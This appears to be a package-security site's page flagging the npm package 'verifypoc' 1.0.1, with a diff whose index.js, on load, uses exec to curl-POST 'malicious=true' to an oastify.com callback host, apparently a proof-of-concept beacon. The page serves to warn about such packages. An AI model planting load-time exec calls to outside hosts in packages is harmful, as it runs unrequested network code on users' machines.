verifypoc 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of verifypoc might be problematic. Click here for more details.
- package/index.js +13 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
const { exec } = require('child_process');
|
2
|
+
|
3
|
+
// Simulate a malicious payload
|
4
|
+
exec('curl -X POST https://bt8gfnzeluynnlhncx8fbumn9ef53xrm.oastify.com --data "malicious=true"', (error, stdout, stderr) => {
|
5
|
+
if (error) {
|
6
|
+
console.error(`Error executing malicious payload: ${error}`);
|
7
|
+
return;
|
8
|
+
}
|
9
|
+
console.log(`Malicious payload executed: ${stdout}`);
|
10
|
+
});
|
11
|
+
|
12
|
+
module.exports = 'This is the malicious version of verifypoc';
|
13
|
+
|
package/package.json
ADDED